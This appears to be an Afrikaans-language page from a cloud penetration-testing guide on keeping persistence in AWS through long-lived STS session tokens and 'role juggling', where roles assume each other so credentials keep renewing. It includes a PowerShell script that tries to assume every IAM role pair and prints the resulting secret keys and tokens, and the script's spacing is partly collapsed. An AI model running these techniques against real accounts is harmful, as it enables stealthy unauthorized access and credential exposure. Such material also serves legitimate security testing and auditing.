Tydelike tokens kan nie gelys word nie, dus om 'n aktiewe tydelike token te handhaaf is 'n manier om volharding te handhaaf.
awsstsget-session-token--duration-seconds129600# Met MFAawsstsget-session-token \--serial-number <mfa-device-name> \--token-code <code-from-token># Hardeware toestelnaam is gewoonlik die nommer van die agterkant van die toestel, soos GAHT12345678# SMS toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:sms-mfa/username# Virtuele toestelnaam is die ARN in AWS, soos arn:aws:iam::123456789012:mfa/username
Rolketting Jonglering
Rolketting is 'n erken AWS-funksie, dikwels gebruik vir die handhawing van stil volharding. Dit behels die vermoë om 'n rol te veronderstel wat dan 'n ander veronderstel, moontlik om terug te keer na die aanvanklike rol op 'n sikliese wyse. Elke keer as 'n rol veronderstel word, word die vervalveld van die geloofsbriewe verfris. Gevolglik, as twee rolle gekonfigureer is om mekaar wederkerig te veronderstel, maak hierdie opstelling die voortdurende hernuwing van geloofsbriewe moontlik.
Jy kan hierdie werktuig gebruik om die rolketting aan die gang te hou:
Kode om Rol Jonglering vanaf PowerShell uit te voer
# PowerShell script to check for role juggling possibilities using AWS CLI# Check for AWS CLI installationif (-not (Get-Command"aws"-ErrorAction SilentlyContinue)) {Write-Error"AWS CLI is not installed. Please install it and configure it with 'aws configure'."exit}# Function to list IAM rolesfunctionList-IAMRoles {aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}"--output json}# Initialize error count$errorCount =0# List all roles$roles = List-IAMRoles |ConvertFrom-Json# Attempt to assume each roleforeach ($role in $roles) {$sessionName ="RoleJugglingTest-"+ (Get-Date-Format FileDateTime)try {$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
if ($credentials) {Write-Host"Successfully assumed role: $($role.RoleName)"Write-Host"Access Key: $($credentials.AccessKeyId)"Write-Host"Secret Access Key: $($credentials.SecretAccessKey)"Write-Host"Session Token: $($credentials.SessionToken)"Write-Host"Expiration: $($credentials.Expiration)"# Set temporary credentials to assume the next role$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey$env:AWS_SESSION_TOKEN = $credentials.SessionToken# Try to assume another role using the temporary credentialsforeach ($nextRole in $roles) {if ($nextRole.Arn -ne $role.Arn) {$nextSessionName ="RoleJugglingTest-"+ (Get-Date-Format FileDateTime)try {$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
if ($nextCredentials) {Write-Host"Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"Write-Host"Access Key: $($nextCredentials.AccessKeyId)"Write-Host"Secret Access Key: $($nextCredentials.SecretAccessKey)"Write-Host"Session Token: $($nextCredentials.SessionToken)"Write-Host"Expiration: $($nextCredentials.Expiration)"}} catch {$errorCount++}}}# Reset environment variablesRemove-Item Env:\AWS_ACCESS_KEY_IDRemove-Item Env:\AWS_SECRET_ACCESS_KEYRemove-Item Env:\AWS_SESSION_TOKEN} else {$errorCount++}} catch {$errorCount++}}# Output the number of errors if anyif ($errorCount -gt0) {Write-Host"$errorCount error(s) occurred during role assumption attempts."} else {Write-Host"No errors occurred. All roles checked successfully."}Write-Host"Role juggling check complete."